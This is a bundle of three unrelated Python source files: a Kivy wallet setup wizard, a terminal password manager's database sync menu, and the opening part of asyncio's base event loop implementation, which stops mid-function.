__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
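# A hedged sketch of how a consumer is expected to hook this event; the
# on_done handler and its body are hypothetical, bind() is the standard Kivy
# wiring for the __events__ declared above:
#
#   def on_done(instance, wallet):
#       pass  # e.g. open the wallet in the main window
#
#   wizard.bind(on_wizard_complete=on_done)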
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigner\'s master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None, None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
db_sync_screen.py
|
import pathlib
import threading
import subprocess
import json
from pw_manager.utils import utils, decorators, constants
from pw_manager.db_sync import db_sync
from pw_manager.db import Database
from YeetsMenu.menu import Menu, Option
from colorama import Style, Fore
from cryptography.fernet import InvalidToken
@decorators.require_valid_db()
@decorators.require_valid_sync_config()
def upload_current_db():
event = threading.Event()
try:
with open(utils.get_sync_file()) as f:
data: dict = json.load(f)
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Uploading file...", event]).start()
db_sync.sync(db=constants.db_file,
action=db_sync.Options.UPLOAD,
server=data.get("server"),
username=data.get("username"),
password=data.get("password"),
path=data.get("path"))
finally:
event.set()
utils.clear_screen()
print(f"{Fore.GREEN}Successfully uploaded the database file!{Style.RESET_ALL}")
@decorators.require_valid_db()
@decorators.require_valid_sync_config()
def download_and_replace_current_db():
event = threading.Event()
try:
with open(utils.get_sync_file()) as f:
data: dict = json.load(f)
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Downloading file...", event]).start()
db_sync.sync(db=constants.db_file,
action=db_sync.Options.DOWNLOAD,
server=data.get("server"),
username=data.get("username"),
password=data.get("password"),
path=data.get("path"))
finally:
event.set()
utils.clear_screen()
print(f"{Fore.GREEN}Successfully downloaded the database file!{Style.RESET_ALL}")
while True:
password = utils.ask_till_input_secret(f"{constants.colors[1]}Password for the database!\n > {constants.colors[0]}")
utils.reset_style()
try:
db: Database = Database(constants.db_file.path, password)
db.read()
constants.db_file = db
break
except InvalidToken:
print(f"{Fore.RED}Invalid password!{Style.RESET_ALL}")
try_again = utils.ask_till_input("Do you want to try again? y/n: ")
if try_again.lower() == "y":
continue
else:
break
print(f"{Fore.GREEN}Successfully selected the downloaded database!{Style.RESET_ALL}")
@decorators.catch_ctrl_c
def setup_sync():
utils.clear_screen()
utils.print_noice("Setup sync")
sync_file = pathlib.Path(utils.get_sync_file())
if sync_file.exists():
should_overwrite = utils.ask_till_input(f"{constants.colors[1]}Are you sure you want to overwrite and re-setup your sync settings? y/N\n > {constants.colors[0]}")
utils.reset_style()
if not should_overwrite.lower().strip() == "y":
print(f"{Fore.RED}Aborting overwrite!{Style.RESET_ALL}")
return
print(f"{Fore.GREEN}Overwriting...")
server = utils.ask_till_input(f"{constants.colors[1]}Please enter a server to sync your database with!\n > {constants.colors[0]}").strip()
event = threading.Event()
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Running a quick ping to see if the server is reachable!", event]).start()
process = subprocess.Popen(f"ping -c 2 {server}".split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
exit_code = process.wait(timeout=30)
event.set()
utils.clear_screen()
if exit_code != 0:
print(f"{Fore.RED}The server \"{server}\" could not be reached!{Style.RESET_ALL}")
return
print(f"{Fore.GREEN}Server could be reached!{Style.RESET_ALL}")
username = utils.ask_till_input(f"{constants.colors[1]}Please enter a username to that server!\n > {constants.colors[0]}").strip()
password = utils.ask_till_input_secret(f"{constants.colors[1]}Please enter the password to that username!\n > {constants.colors[0]}").strip()
event = threading.Event()
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Checking if the credentials are working!", event]).start()
valid = db_sync.check_credentials(server, username, password)
event.set()
utils.clear_screen()
if not valid:
print(f"{Fore.RED}Credentials are not working!{Style.RESET_ALL}")
return
print(f"{Fore.GREEN}Credentials are working!{Style.RESET_ALL}")
path = utils.ask_till_input(f"{constants.colors[1]}Please enter the path of where the database should be stored on the server! (with the .db ending)\n > {constants.colors[0]}")
with open(utils.get_sync_file(), "w+") as f:
data = {
"server": server,
"username": username,
"password": password,
"path": path
}
json.dump(data, f, indent=2)
print(f"{Fore.GREEN}Configuration successfully saved!{Style.RESET_ALL}")
def show():
utils.clear_screen()
menu = Menu(utils.get_noice_text("Database sync"), colors=constants.colors)
menu.add_selectable(Option("Setup sync", setup_sync))
menu.add_selectable(Option("Upload current db", upload_current_db))
menu.add_selectable(Option("Download and replace current db", download_and_replace_current_db))
menu.run()
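# The sync configuration consumed above is the small JSON document written by
# setup_sync(); a representative example with placeholder values:
#
#   {
#     "server": "backup.example.org",
#     "username": "alice",
#     "password": "hunter2",
#     "path": "/home/alice/passwords.db"
#   }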
|
base_events.py
|
"""Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
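# Illustrative expectations for _ipaddr_info (example values):
#   _ipaddr_info('127.0.0.1', 80, socket.AF_UNSPEC, socket.SOCK_STREAM, 0)
#       -> (socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, '', ('127.0.0.1', 80))
#   _ipaddr_info('example.com', 80, socket.AF_UNSPEC, socket.SOCK_STREAM, 0)
#       -> None  (not a literal IP address, so getaddrinfo is still required)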
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
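# Illustrative expectation: with the default first_address_family_count=1, an
# input of [v4_a, v4_b, v6_a] (two AF_INET entries, one AF_INET6) is reordered
# to [v4_a, v6_a, v4_b], alternating address families so that Happy Eyeballs
# tries one address per family early on.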
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, (SystemExit, KeyboardInterrupt)):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return ()
return tuple(trsock.TransportSocket(s) for s in self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self._loop)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except exceptions.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_running()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_running()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it is undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
# Only check when the default executor is being used
self._check_default_executor()
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor()
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
warnings.warn(
'Using the default executor that is not an instance of '
'ThreadPoolExecutor is deprecated and will be prohibited '
'in Python 3.9',
DeprecationWarning, 2)
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
"""Create, bind and connect one socket."""
my_exceptions = []
exceptions.append(my_exceptions)
family, type_, proto, _, address = addr_info
sock = None
try:
sock = socket.socket(family=family, type=type_, proto=proto)
sock.setblocking(False)
if local_addr_infos is not None:
for _, _, _, _, laddr in local_addr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
my_exceptions.append(exc)
else: # all bind attempts failed
raise my_exceptions.pop()
await self.sock_connect(sock, address)
return sock
except OSError as exc:
my_exceptions.append(exc)
if sock is not None:
sock.close()
raise
except:
if sock is not None:
sock.close()
raise
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None,
happy_eyeballs_delay=None, interleave=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given Internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if happy_eyeballs_delay is not None and interleave is None:
# If using happy eyeballs, default to interleave addresses by family
interleave = 1
if host is not None or port is not None:
if sock is not None:
